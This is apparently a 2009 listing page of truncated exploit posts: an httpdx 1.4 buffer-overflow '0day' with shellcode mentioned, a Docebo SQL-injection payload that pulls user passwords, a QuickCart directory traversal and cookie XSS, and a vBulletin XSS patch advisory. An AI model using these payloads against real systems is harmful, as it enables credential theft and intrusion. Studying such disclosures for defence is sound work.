httpdx web server 1.4 is vulnerable to a remote buffer overflow using long GET requests such as http://www.example.com/aaa=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
The vulnerability lies in httpdx_src/http.cpp in h_handlepeer() : strcpy(index,client->filereq);

Other versions may also be vulnerable.

Exploit (0day) (Tested with httpdx 1.4 on WinXP SP3)


#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

/* 128 byte portbinding shellcode (for WinXP SP3) port 58821
  Derived from shellcode written by silicon */ ...
Views: 1462 | Added by: apeh1706 | Date: 13 October 2009 | Comments (1)

**************************************************************
Application: Docebo
Version affected: 3.6.0.3
Website: http://www.docebo.com
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************

########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

-> http://localhost/docebo/ ...
Views: 8636 | Added by: apeh1706 | Date: 13 October 2009 | Comments (0)

DISCOVERED: Paweł 'kl3ryk' Łaskarzewski
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan

DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISTING FILES]-[EXISTING ACTION IN THIS FILE]-
Most actions load templates from the wrong directory and then throw an exception.

example:
http://victim.com/?p=../actions_admin/settings-config
#########################
COOKIE XSS
1) in login form in admin.php
You need to change the "sLogin" cookie and put your XSS code in it. After
that, when you go to http://revival.pl/test/quickcart/admin.php,
you will see your XSS executed.

####templates/admin/loign.tpl
<form method="post" action="$sLoginPage" name="form">
 <fieldset>< ...
Views: 1196 | Added by: apeh1706 | Date: 13 October 2009 | Comments (0)

vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Rese ...
Views: 29850 | Added by: apeh1706 | Date: 13 October 2009 | Comments (229)
